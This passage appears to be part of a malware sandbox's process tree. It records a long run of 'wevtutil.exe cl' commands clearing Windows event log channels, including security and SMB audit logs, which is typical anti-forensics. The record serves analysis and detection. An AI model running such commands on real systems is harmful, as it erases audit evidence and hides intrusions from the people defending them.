    wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
    3⤵
    PID:4828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Operational"
    3⤵
    PID:4856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
    3⤵
    PID:4852
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
    3⤵
    PID:4784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
    3⤵
    PID:4780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
    3⤵
    PID:4912
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Debug"
    3⤵
    PID:2460
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
    3⤵
    PID:2440
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-Synth3dvsc/Admin"
    3⤵
    PID:2288
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-Kernel-Mode-Transport/Debug"
    3⤵
    PID:4904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-User-Mode-Transport/Debug"
    3⤵
    PID:4960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-SessionServices/Operational"
    3⤵
    PID:2564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Remotefs-Rdbss/Diagnostic"
    3⤵
    PID:4944
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Remotefs-Rdbss/Operational"
    3⤵
    PID:4952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ResetEng-Trace/Diagnostic"
    3⤵
    PID:4940
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
    3⤵
    PID:5012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
    3⤵
    PID:4988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
    3⤵
    PID:4984
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
    3⤵
    PID:2712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RetailDemo/Admin"
    3⤵
    PID:3436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RetailDemo/Operational"
    3⤵
    PID:4272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Runtime-Graphics/Analytic"
    3⤵
    PID:900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Runtime-Networking-BackgroundTransfer/Tracing"
    3⤵
    PID:5016
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Runtime-Networking/Tracing"
    3⤵
    PID:5032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Runtime-Web-Http/Tracing"
    3⤵
    PID:4184
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Runtime-WebAPI/Tracing"
    3⤵
    PID:4160
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTCaptureEngine"
    3⤵
    PID:3492
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTMediaStreamSource"
    3⤵
    PID:5068
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTTranscode"
    3⤵
    PID:5080
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Runtime/CreateInstance"
    3⤵
    PID:5100
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Runtime/Error"
    3⤵
    PID:5112
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SENSE/Operational"
    3⤵
    PID:3992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBClient/Analytic"
    3⤵
    PID:4108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBClient/HelperClassDiagnostic"
    3⤵
    PID:4144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBClient/ObjectStateDiagnostic"
    3⤵
    PID:4104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBClient/Operational"
    3⤵
    PID:4120
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBServer/Analytic"
    3⤵
    PID:1004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBServer/Audit"
    3⤵
    PID:4260
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBServer/Connectivity"
    3⤵
    PID:4400
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBServer/Diagnostic"
    3⤵
    PID:4372
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBServer/Operational"
    3⤵
    PID:4424
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBServer/Performance"
    3⤵
    PID:4440
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBServer/Security"
    3⤵
    PID:4452
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBWitnessClient/Admin"
    3⤵
    PID:4460
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SMBWitnessClient/Informational"
    3⤵
    PID:3932
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SPB-ClassExtension/Analytic"
    3⤵
    PID:4496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SPB-HIDI2C/Analytic"
    3⤵
    PID:4456
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Schannel-Events/Perf"
    3⤵
    PID:4468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ScmBus/Analytic"
    3⤵
    PID:4488
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ScmBus/Certification"
    3⤵
    PID:4508
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ScmBus/Diagnose"
    3⤵
    PID:4564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ScmBus/Operational"
    3⤵
    PID:4548
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sdbus/Analytic"
    3⤵
    PID:4512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sdbus/Debug"
    3⤵
    PID:4592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sdstor/Analytic"
    3⤵
    PID:4624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
    3⤵
    PID:4632
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
    3⤵
    PID:4672
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SearchUI/Diagnostic"
    3⤵
    PID:4668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SearchUI/Operational"
    3⤵
    PID:4692
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SecureAssessment/Operational"
    3⤵
    PID:4704
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
    3⤵
    PID:3280
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
    3⤵
    PID:4800
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-EnterpriseData-FileRevocationManager/Operational"
    3⤵
    PID:4816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Operational"
    3⤵
    PID:4832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Performance"
    3⤵
    PID:4808
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
    3⤵
    PID:4824
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-IdentityStore/Performance"
    3⤵
    PID:4840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-LessPrivilegedAppContainer/Operational"
    3⤵
    PID:4872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-Netlogon/Operational"
    3⤵
    PID:4772
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-GC/Analytic"
    3⤵
    PID:4768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-GenuineCenter-Logging/Operational"
    3⤵
    PID:4888
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-Notifications/ActionCenter"
    3⤵
    PID:4776
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX/Analytic"
    3⤵
    PID:1308
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
    3⤵
    PID:4908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-UserConsentVerifier/Audit"
    3⤵
    PID:2348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-Vault/Performance"
    3⤵
    PID:4900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Admin"
    3⤵
    PID:2404
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Operational"
    3⤵
    PID:4956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Perf"
    3⤵
    PID:4936
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SendTo/Diagnostic"
    3⤵
    PID:4948
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
    3⤵
    PID:4992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sensors/Debug"
    3⤵
    PID:4972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sensors/Performance"
    3⤵
    PID:5008
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Serial-ClassExtension-V2/Analytic"
    3⤵
    PID:3496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Serial-ClassExtension/Analytic"
    3⤵
    PID:480
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
    3⤵
    PID:4244
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
    3⤵
    PID:848
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
    3⤵
    PID:3240
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Servicing/Debug"
    3⤵
    PID:4192
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SettingSync-Azure/Debug"
    3⤵
    PID:4180
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SettingSync-Azure/Operational"
    3⤵
    PID:4188
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Analytic"
    3⤵
    PID:1160
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Debug"
    3⤵
    PID:4176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Operational"
    3⤵
    PID:4200
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SettingSync/Analytic"
    3⤵
    PID:3292
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SettingSync/Debug"
    3⤵
    PID:5088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SettingSync/Operational"
    3⤵
    PID:5108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SettingSync/VerboseDebug"
    3⤵
    PID:4128
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
    3⤵
    PID:4108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
    3⤵
    PID:4144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupPlatform/Analytic"
    3⤵
    PID:4104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
    3⤵
    PID:4124
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
    3⤵
    PID:1004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
    3⤵
    PID:4380
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AppWizCpl/Diagnostic"
    3⤵
    PID:4204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
    3⤵
    PID:4368
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
    3⤵
    PID:4276
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
    3⤵
    PID:4376
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredentialProviderUser/Diagnostic"
    3⤵
    PID:4320
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
    3⤵
    PID:4432
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-LogonUI/Diagnostic"
    3⤵
    PID:4388
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
    3⤵
    PID:4492
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-ConnectedAccountState/ActionCenter"
    3⤵
    PID:4536
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-Core/ActionCenter"
    3⤵
    PID:4544
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-Core/AppDefaults"
    3⤵
    PID:4532
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
    3⤵
    PID:4540
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-Core/LogonTasksChannel"
    3⤵
    PID:4584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-Core/Operational"
    3⤵
    PID:4588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
    3⤵
    PID:4604
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-LockScreenContent/Diagnostic"
    3⤵
    PID:4628
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-OpenWith/Diagnostic"
    3⤵
    PID:4652
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-Search-UriHandler"
    3⤵
    PID:4640
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
    3⤵
    PID:2192
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
    3⤵
    PID:4688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Diagnostic"
    3⤵
    PID:4712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Operational"
    3⤵
    PID:4700
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
    3⤵
    PID:4724
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SleepStudy/Diagnostic"
    3⤵
    PID:4736
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SmartCard-Audit/Authentication"
    3⤵
    PID:4744
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SmartCard-DeviceEnum/Operational"
    3⤵
    PID:4792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SmartCard-TPM-VCard-Module/Admin"
    3⤵
    PID:4812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SmartCard-TPM-VCard-Module/Operational"
    3⤵
    PID:4828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SmbClient/Connectivity"
    3⤵
    PID:4856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SmbClient/Diagnostic"
    3⤵
    PID:4852
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SmbClient/Security"
    3⤵
    PID:4784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
    3⤵
    PID:4780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
    3⤵
    PID:4912
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
    3⤵
    PID:2460
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Spellchecking-Host/Analytic"
    3⤵
    PID:2440
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SruMon/Diagnostic"
    3⤵
    PID:2424
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SrumTelemetry"
    3⤵
    PID:4904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StateRepository/Debug"
    3⤵
    PID:4960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StateRepository/Diagnostic"
    3⤵
    PID:2564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StateRepository/Operational"
    3⤵
    PID:4944
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StateRepository/Restricted"
    3⤵
    PID:4952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
    3⤵
    PID:4940
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
    3⤵
    PID:5012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Admin"
    3⤵
    PID:4988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Analytic"
    3⤵
    PID:4984
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Debug"
    3⤵
    PID:2712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Diagnose"
    3⤵
    PID:3436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Operational"
    3⤵
    PID:4272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Admin"
    3⤵
    PID:900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Analytic"
    3⤵
    PID:5016
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Debug"
    3⤵
    PID:5032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Diagnose"
    3⤵
    PID:4184
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Operational"
    3⤵
    PID:4160
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Admin"
    3⤵
    PID:3492
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Analytic"
    3⤵
    PID:5068
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Debug"
    3⤵
    PID:5080
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Diagnose"
    3⤵
    PID:5096
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Operational"
    3⤵
    PID:4136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Admin"
    3⤵
    PID:5104
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Analytic"
    3⤵
    PID:4100
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Debug"
    3⤵
    PID:4236
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Diagnose"
    3⤵
    PID:4252
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Operational"
    3⤵
    PID:4324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-Tiering-IoHeat/Heat"
    3⤵
    PID:4264
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Storage-Tiering/Admin"
    3⤵
    PID:4208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorageManagement/Debug"
    3⤵
    PID:4408
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorageManagement/Operational"
    3⤵
    PID:4400
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorageSpaces-Driver/Diagnostic"
    3⤵
    PID:4384
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorageSpaces-Driver/Operational"
    3⤵
    PID:4404
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorageSpaces-Driver/Performance"
    3⤵
    PID:4392
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorageSpaces-ManagementAgent/WHC"
    3⤵
    PID:4412
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorageSpaces-SpaceManager/Diagnostic"
    3⤵
    PID:4444
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorageSpaces-SpaceManager/Operational"
    3⤵
    PID:4436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Store/Operational"
    3⤵
    PID:4504
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
    3⤵
    PID:4516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"
    3⤵
    PID:4528
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"
    3⤵
    PID:4572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Superfetch/PfApLog"
    3⤵
    PID:4560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
    3⤵
    PID:4608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
    3⤵
    PID:4616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-System-Profile-HardwareId/Diagnostic"
    3⤵
    PID:4612
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SystemSettingsHandlers/Debug"
    3⤵
    PID:4620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SystemSettingsThreshold/Debug"
    3⤵
    PID:4696
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SystemSettingsThreshold/Diagnostic"
    3⤵
    PID:4632
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SystemSettingsThreshold/Operational"
    3⤵
    PID:736
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"
    3⤵
    PID:4732
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TCPIP/Operational"
    3⤵
    PID:800
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"
    3⤵
    PID:4684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"
    3⤵
    PID:4728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"
    3⤵
    PID:4752
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
    3⤵
    PID:4816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TTS/Diagnostic"
    3⤵
    PID:4756
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TWinAPI/Diagnostic"
    3⤵
    PID:4748
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TWinUI/Diagnostic"
    3⤵
    PID:4796
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TWinUI/Operational"
    3⤵
    PID:4804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TZSync/Analytic"
    3⤵
    PID:4872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TZSync/Operational"
    3⤵
    PID:4784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
    3⤵
    PID:4780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"
    3⤵
    PID:4912
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"
    3⤵
    PID:2460
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Maintenance"
    3⤵
    PID:2440
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"
    3⤵
    PID:2424
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"
    3⤵
    PID:2400
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
    3⤵
    PID:4968
